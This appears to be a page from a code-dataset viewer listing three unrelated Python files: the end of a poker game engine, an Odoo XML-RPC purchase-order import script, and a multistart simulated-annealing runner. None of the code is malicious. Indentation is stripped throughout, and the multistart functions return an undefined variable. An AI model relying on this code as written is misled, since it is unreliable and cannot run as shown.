self._round += 1
self._tocall = 0
self._lastraise = 0
def resolve_game(self, players):
# print('Community cards: ', end='')
# Card.print_pretty_cards(self.community)
if len(players)==1:
players[0].refund(sum(self._side_pots))
# print('Player', players[0].playerID, 'wins the pot (',sum(self._side_pots),')')
self._totalpot = 0
else:
# compute hand ranks
for player in players:
#print(player.hand, self.community)
player.handrank = self._evaluator.evaluate(player.hand, self.community)
# trim side_pots to only include the non-empty side pots
temp_pots = [pot for pot in self._side_pots if pot>0]
# compute who wins each side pot and pay winners
for pot_idx,_ in enumerate(temp_pots):
# print('players last pots', [(p.playerID, p.lastsidepot) for p in players])
# find players involved in given side_pot, compute the winner(s)
pot_contributors = [p for p in players if p.lastsidepot >= pot_idx]
winning_rank = min([p.handrank for p in pot_contributors])
winning_players = [p for p in pot_contributors if p.handrank == winning_rank]
for player in winning_players:
split_amount = int(self._side_pots[pot_idx]/len(winning_players))
if not self._quiet:
print('Player', player.playerID, 'wins side pot (',int(self._side_pots[pot_idx]/len(winning_players)),')')
player.refund(split_amount)
self._side_pots[pot_idx] -= split_amount
# any remaining chips after splitting go to the winner in the earliest position
if self._side_pots[pot_idx]:
earliest = self._first_to_act([player for player in winning_players])
earliest.refund(self._side_pots[pot_idx])
def reset(self):
for player in self._seats:
if not player.emptyplayer and not player.sitting_out:
player.reset_hand()
self.community = []
self._current_sidepot = 0
self._totalpot = 0
self._side_pots = [0]*len(self._seats)
self._deck.shuffle()
self._button = (self._button + 1) % len(self._seats)
while not self._seats[self._button].playing_hand:
self._button = (self._button + 1) % len(self._seats)
def output_state(self, current_player):
return {'players':[player.player_state() for player in self._seats],
'community':self.community,
'my_seat':current_player.get_seat(),
'pocket_cards':current_player.hand,
'pot':self._totalpot,
'button':self._button,
'tocall':(self._tocall-current_player.currentbet),
'stack':current_player.stack,
'bigblind':self._bigblind,
'playerID':current_player.playerID,
'lastraise':self._lastraise,
'minraise':max(self._bigblind, self._lastraise + self._tocall)}
def reset_stacks(self):
for player in self._seats:
player.reset_stack()
def get_ai(self):
for player in self._seats:
if player.get_ai_type() == 0:
return player.ai
|
50_po_history.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
from xmlrpc import client as xmlrpclib
import multiprocessing as mp
from scriptconfig import URL, DB, UID, PSW, WORKERS
# ==================================== Purchase ORDER ====================================
def update_purchase_order(pid, data_pool, error_ids, write_ids, partner_ids, term_ids):
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
while data_pool:
try:
data = data_pool.pop()
order_no = data.get('ORDR-NUM', '')
partner_id = partner_ids.get(data.get('VEND-CODE', ''))
term_id = term_ids.get(data.get('TERM-CODE', ''))
if not partner_id or not term_id:
error_ids.append(order_no)
continue
vals={'name': data.get('ORDR-NUM', ''),
'partner_id': partner_id,
'date_order': data.get('ORDR-DATE'),
'release_date': data.get('ORDR-RELEASE-DATE'),
'payment_term_id': term_id,
# 'state': 'purchase'
}
res = write_ids.get(order_no, [])
if res:
sock.execute(DB, UID, PSW, 'purchase.order', 'write', res, vals)
print(pid, 'UPDATE - SALE ORDER', res)
else:
res = sock.execute(DB, UID, PSW, 'purchase.order', 'create', vals)
print(pid, 'CREATE - PURCHASE ORDER', res, order_no)
if not data_pool:
break
except Exception as e:
print(e)
break
def sync_purchase_orders():
manager = mp.Manager()
data_pool = manager.list()
error_ids = manager.list()
write_ids = manager.dict()
process_Q = []
fp = open('files/polhist1.csv', 'r')
csv_reader = csv.DictReader(fp)
for vals in csv_reader:
data_pool.append(vals)
fp.close()
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
res = sock.execute(DB, UID, PSW, 'res.partner', 'search_read', ['|', ('active', '=', False), ('active', '=', True)], ['customer_code'])
vendor = {rec['customer_code']: rec['id'] for rec in res}
partner_ids = manager.dict(vendor)
res = sock.execute(DB, UID, PSW, 'purchase.order', 'search_read', [], ['name'])
write_ids = {rec['name']: rec['id'] for rec in res}
payment_terms = sock.execute(DB, UID, PSW, 'account.payment.term', 'search_read', [('order_type','=','purchase')], ['id','code'])
term_ids = {term['code']: term['id'] for term in payment_terms}
orders = None
vendor = None
res = None
payment_terms = None
for i in range(WORKERS):
pid = "Worker-%d" % (i + 1)
worker = mp.Process(name=pid, target=update_purchase_order, args=(pid, data_pool, error_ids, write_ids, partner_ids, term_ids))
process_Q.append(worker)
worker.start()
for worker in process_Q:
worker.join()
if __name__ == "__main__":
sync_purchase_orders()
|
multistart.py
|
"""
///////////////////////////////////////////////////////////////////////////////
// Authors: Chester Holtz, Devon Merrill, James (Ting-Chou) Lin, Connie (Yen-Yi) Wu
// (respective Ph.D. advisors: Chung-Kuan Cheng, Andrew B. Kahng, Steven Swanson).
//
// BSD 3-Clause License
//
// Copyright (c) 2018, The Regents of the University of California
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this
// list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of the copyright holder nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE
// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
///////////////////////////////////////////////////////////////////////////////
"""
import random, math
import numpy as np
import numba
from numba import jit
import copy, sys, time
import collections
from operator import itemgetter
from tqdm import tqdm
import itertools
import utils
import multiprocessing as mp
import subprocess
try:
num_cpus = mp.cpu_count()
except NotImplementedError:
num_cpus = 2
"""
for now, make directories associated with each idx manually.
"""
def f(idx):
res = subprocess.check_output(["./sa", "-p","designs/bm1","-i", str(2500),"-j",str(25),"-t",str(0.025), "-x", str(idx)])
return res.strip()[-2:]
def worker(args, output):
output.put(f(*args))
def multistart():
K = max(4,mp.cpu_count())
idx = -1
for k in tqdm(range(K),desc='multistart'):
processes = []
manager = mp.Manager()
output = manager.Queue()
for i in range(num_cpus):
p = mp.Process(target=worker, args=((i,),output))
processes.append(p)
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
print(results)
best_result = max(results,key=itemgetter(1)) # max result by cost
best_cost = best_result[1]
best_idx = best_result[0]
print('best result: ')
print("idx: " + str(best_idx))
print("cost: " + str(best_cost))
return cost
multistart()
def nmultistart():
K = max(4,mp.cpu_count())
idx = -1
for k in tqdm(range(K),desc='multistart'):
processes = []
manager = mp.Manager()
output = manager.Queue()
for i in range(num_cpus):
p = mp.Process(target=worker, args=((i,),output))
processes.append(p)
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
print(results)
#best_result = max(results,key=itemgetter(1)) # max result by cost
#if best_result[1] < cost:
# cost = best_result[1]
# idx = best_result[0]
#else:
# cost_history.extend([best_cost]*1000)
print('done')
return cost
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.